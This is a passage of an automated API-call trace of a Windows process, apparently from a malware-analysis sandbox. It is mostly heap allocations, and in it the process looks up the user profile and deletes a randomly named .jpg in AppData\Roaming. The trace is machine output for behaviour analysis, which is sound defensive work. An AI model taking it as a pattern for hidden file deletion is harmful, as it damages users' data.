hHeap=0x25c0000) returned 1 [0206.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0206.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0206.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0206.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0206.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0206.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0206.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0206.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0206.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0206.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0206.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0206.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0206.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0206.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0206.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0206.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0206.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.390] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0206.391] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0206.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0206.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0206.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.391] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0206.396] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/qN0j1jGF7bK.jpg", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qN0j1jGF7bK.jpg", lpFilePart=0x8bedfc*="qN0j1jGF7bK.jpg") returned 0x3d [0206.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0206.396] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qN0j1jGF7bK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qn0j1jgf7bk.jpg")) returned 0x2020 [0206.397] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qN0j1jGF7bK.jpg", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fc02520, ftCreationTime.dwHighDateTime=0x1d4d281, ftLastAccessTime.dwLowDateTime=0xbd7fbdf0, ftLastAccessTime.dwHighDateTime=0x1d4ce2e, ftLastWriteTime.dwLowDateTime=0xbd7fbdf0, ftLastWriteTime.dwHighDateTime=0x1d4ce2e, nFileSizeHigh=0x0, nFileSizeLow=0x17426, dwReserved0=0xdcb, dwReserved1=0x4, cFileName="qN0j1jGF7bK.jpg", cAlternateFileName="QN0J1J~1.JPG")) returned 0xaa5860 [0206.397] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qN0j1jGF7bK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qn0j1jgf7bk.jpg")) returned 1 [0206.406] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fc02520, ftCreationTime.dwHighDateTime=0x1d4d281, ftLastAccessTime.dwLowDateTime=0xbd7fbdf0, ftLastAccessTime.dwHighDateTime=0x1d4ce2e, ftLastWriteTime.dwLowDateTime=0xbd7fbdf0, ftLastWriteTime.dwHighDateTime=0x1d4ce2e, nFileSizeHigh=0x0, nFileSizeLow=0x17426, dwReserved0=0xdcb, dwReserved1=0x4, cFileName="qN0j1jGF7bK.jpg", cAlternateFileName="QN0J1J~1.JPG")) returned 0 [0206.406] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0206.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.407] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0206.407] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0206.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0206.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.408] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0206.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0206.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/qN0j1jGF7bK.jpg", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qN0j1jGF7bK.jpg", lpFilePart=0x8bf658*="qN0j1jGF7bK.jpg") returned 0x3d [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0206.410] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qN0j1jGF7bK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qn0j1jgf7bk.jpg")) returned 0xffffffff [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.410] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0206.410] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.410] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 